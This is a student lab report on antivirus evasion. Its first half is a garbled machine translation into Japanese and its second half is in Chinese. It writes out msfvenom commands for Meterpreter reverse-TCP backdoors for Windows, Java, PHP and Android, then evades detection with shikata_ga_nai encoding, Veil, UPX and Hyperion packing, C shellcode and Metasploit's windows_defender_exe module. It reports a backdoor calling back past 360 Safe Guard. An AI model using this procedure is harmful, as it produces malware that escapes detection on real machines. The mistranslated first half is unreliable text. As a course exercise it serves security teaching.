20174311の唐嘉EXP3回避殺傷原則と実践

 

  まず、実験的な要件

  （A）コンテンツ実験

  1.練習殺害回避するために、種々の技術

• 適切な使用のMSFエンコーダ

• 他の文書生成msfvenomジャーなど

• ベール

• パッカー

• C +シェルコードを使用してプログラミング

• 他の教室には、方法を説明していません 

  無料を殺すために組み合わせて、様々な技術によって実装2.悪意のあるコード

   3.測定で正常に接続された他のコンピュータへのソフトのキル、実行バックの場合は、お使いのコンピュータのソフト名とバージョンを殺すために示されています

  （B）原理

• 無料技法を殺すためには、アンチウイルス技術アンチアンチウイルスは、「自由キル」と呼ばれ、それはアンチウイルスソフトウェア技術を殺すからトロイの木馬ウイルスへの道を指しと呼ばれます

• 殺害を避けるための基本的な方法は、異なる署名や行動の変化を持っています

•  マルウェア検出機構マルウェア検出シグニチャベースの検出、ヒューリスティックの挙動ベースのマルウェア検出

   第二に、実験的なコンテンツ

     1.1方法

    1.1.1適切な使用のMSFエンコーダ

     検出部位VirSCANとウイルスの合計（疑わしいファイルに対するウイルス検出エンジンの最新バージョンは、オンラインスキャンをアップロードし、異なるメーカーの様々なを通じて提供される無料サービスのユーザーの大多数のための非営利サイト、およびすぐにテスト結果を表示することができますアウト。）

    実験2バックドア4311を生成しますが_backdoor.exe、以下のように2件のスクリーニング結果があるサイトにアップロードされました：

 

    図から分かるように、最後の実験のバックドアは簡単にソフトに検出殺しました。

    バックドアは、エンコーダMSFによってコードされます

    カーリーには/usr/share/metasploit-framework/modules/payloads/stagers/windows、フォルダ、lsWindowsプラットフォームの下の接続を表示します。

/usr/share/metasploit-framework/modules/encoders/x86フォルダ、lsx86ベースのエンコードを参照してください。

        ここでは、TCP接続モードと選択されたshikata_ga_nai符号化モードは、次のコマンドを入力します。msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 52 -b '\x00' LHOST=192.168.80.135 LPORT=4311 -f exe > tjhhh.exe

 

     次のようにスキャン結果に2つの別々のサイトでは、次のとおりです。

     ああ際に、システムの問題VirSCANに置く量は、検出したが、それは私たちの判断に影響を与えません。

     このように、実質的な効果のために複数のエンコーディングを殺す避けるために。

    他の文書生成msfvenomジャーなど

  Javaのバックドアを生成します

   カリでは、msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.80.135 lport=5227 x> 4311tj_backdoor_java.jar生成されたjarファイル

 

    私のホームネットワークが遅い:(プラットフォームのスキャンにアップロード、私は、このサイトVirSCANかなりカードに乗った後に...そう、このウェブサイトの多くの検出は、私の文章のブログにあるように、このサイトは私のコンピュータ上のときは良いときも悪いこと少し良い時間又はネットワークが検出された場合、時間が均一でなくてもよいです。）

    検出の確率が少し低下したことは明らかです。

        PHPのバックドアを生成します

   使用するとmsfvenom -p php/meterpreter/reverse_tcp lhost=192.168.80.135 lport=4311 x> 4311tj_backdoor.php、PHPのファイルを生成します。

 

    テストのためのウェブサイトで：

    私たちは、検出率が比較的低いことがわかります。

         ジェネレーションAndroidのバックドア

    カーリーには、msfvenom -p android/meterpreter/reverse_tcp lhost=<ip_of_linux> lport=5227 x> zxy175227_backdoor.apk（インストールパッケージの形で）生成されたAPKファイル

 

    検出して参照するためのプラットフォームを設置。

 

    この検出はまだ見ることができますが、まだウイルスファイルのために思い出されて。

    1.1.3ベール

    しかし、テイトの困難なインストールの問題は、（コンピュータが遅い私に番号を傷つける）、私は多くの方法を使用して、見たブログが正常に行われた、私はあまりしませんが、特定のプロセス、もちろん、ここで私は（...長い時間後）二回、それをインストールし、最初のパスは、インストールパッケージの一部をアップグレードするために私を促し、あなたのアップグレードにそれに従うもう一度再インストールだけで罰金に促さ（私は知りません自分自身にどのような素晴らしい方法）。

    張は、成功にショット：

     入力use evasionベール-回避に：

    入力use c/meterpreter/rev_tcp.py設定インターフェイスに：

 

        IP接続の設定リバウンド、入力set LHOST 192.168.80.135

   ポートを設定します。set LPORT 4311

   入力generateバックドアファイルを生成して、名前を入力し、私はここにいました：veil_c_4311

       そのヒントによると、ファイルの場所にあり、その後、ホスト上で検出されたサイトを置くためにコピーすることができます。

 

     これは容易に検出見ることができます。

     パッカー

       1.圧縮シェルUPX

     コマンドを使用します。upx 4311.exe -o 4311_upxed.exe

 

         然后放到网站上检测一下：

     啊哦，已经报毒了，估计检测率也低不到哪里去。

 

     果不其然，病毒文件基本被敲定了。

     2.加密壳Hyperion

        hyperion.exe这个文件的寻找也是费了一番功夫，用其他人的方法总是弄不出来，最后用了奚晨妍同学的办法才得以成功。

     既然在这里花了不少时间，还是详细说一说解决办法。

     安装mingw-w64：apt-get install mingw-w64

     获取zip文件：下载（具体的可以参考她的博客）

     解压缩文件：unzip Hyperion-2.2.zip

    这是会发现找不到hyperion.exe这个文件，这是需要改一个文件的内容，将Makefile文件中第一行改为CC =i686-w64-mingw32-gcc。改完之后敲一下make，然后就可以看到目标文件了。

     然后把之前要加壳的文件也放到这个文件夹里来，输入wine hyperion.exe -v 4311_upxed.exe 4311_upxed_Hyperion.exe对文件加上加密壳。

     之后就把该文件放到网站上检测：

 

 

         1.1.5 使用C + shellcode编程

   输入 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.135 LPORT=4311 -f c，得到一段shellcode编码。

 

     用touch指令创建一个c文件，vim打开编辑，输入这段代码：

 

      使用 i686-w64-mingw32-g++ 4311.c -o 4311.exe指令将c文件转为exe文件。

     放到网站上检测一下：

 

    1.1.6 使用其他课堂未介绍方法

     使用windows/window_defender_exe模块

     启动msfconsole

     使用show evasion查看evasion

    选择windows/windows_defender_exe这个模块，指令为use windows/windows_defender_exe。

    使用show options指令查看要配置的参数。   

 

     就一个文件名参数可以配置，set FILENAME bbskali.exe。

     生成shell：

     set payload windows/meterpreter/reverse_tcp
     set LHOST 192.168.0.93
     set LPORT 4444
     exploit

    在生成的目录下可以找到相应的文件，然后放到网站上进行检测。

 

 

         1.2 通过组合应用各种技术实现恶意代码免杀

    由于刚才的bbskali.exe没有实现免杀，那就用hyperion来给它加个壳试试。也是把bbskali.exe文件复制到加壳文件夹中，输入指令wine h.exe bbskali.exe bbskali_hyperion.exe进行加壳处理。

    在对应的文件夹中找到该文件，放到网站上检测一下：

 

 

           额哦，效果并不怎么样，只能说杀软还是强大的。

 

 

     可以发现回连成功。

           1.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

          软件：360安全卫士

    版本是360安全卫士12

     实测结果：

 

      我当时电脑卡了，我就一下子点了好多个，等电脑反应过来了就显示回连成功了。

 

    三、实验总结

         （一）基础知识问答

          1.杀软是如何检测出恶意代码的？

    （1）基于特征码检测： 恶意代码中一般会有一段有较明显特征的代码也就是特征码，如果杀毒软件检测到程序中代码与特征码库中的代码相同或者相似，就会把该程序当作恶意软件。

    （2）启发式恶意软件检测：如果一个软件干的事通常是恶意软件才会干的，就可从中得到启发，把它看做是恶意软件。

    （3）基于行为的恶意软件检测：从理论上讲，基于行为的检测相当于是启发式的一种，或者是加入了行为监控的启发式。

     2.免杀是做什么？

    我觉得不用理解的太复杂吧，就是通过针对杀毒软件查杀恶意代码的原理，将恶意代码进行修改和包装，反过来使得恶意代码能够不被杀毒软件所检测和查杀的过程。

          3.免杀的基本方法有哪些？

   其实我觉得总的方法就一个，杀软怎么查杀，免杀反其之就好了。具体的可以分为下面这些：

   （1）改变特征码

• 只有exe

  • 加壳：压缩壳，加密壳

• 有shellcode

  • 用encode进行编码

  • 基于payload重新编译生成可执行文件

• 有源代码

  • 用其他语言进行重写再编译（veil-evasion）

   （2）改变行为

• 通讯方式
  • 尽量使用反弹式连接
  • 使用隧道技术
  • 加密通讯数据
• 操作模式
  • 基于内存操作
  • 减少对系统的修改
  • 加入混淆作用的正常功能代码。

   （4）开启杀软能绝对防止电脑中恶意代码吗？

    这个很明显不能哈哈哈，杀软与免杀是一个此消彼长、动态发展的过程，因此说不能绝对防止。

   （二）实验心得体会

    这次实验碰到的最大问题就是电脑有点卡，网络也不太好，安装veil的时候花了好长时间，其中就有一次因为中间网络卡顿了一下，导致某些文件下载出了问题，安装完成后不能使用，于是再一次推到重来（下载一次确实挺费劲，唉）。中间还有不少地方出了问题，也是一些奇奇怪怪的问题，有的我关机重启就解决了，我也很疑惑。

    对于这次实验的内容我觉得还是很有意义的，因为之前只知道杀软，对免杀真不是很了解，这次实验通过这么多方法让我对杀软与免杀这个过程有了更为深刻的认识，有了直观的了解，毕竟直接上手实践了，虽说做的时间很长，但感觉还是很有收获的。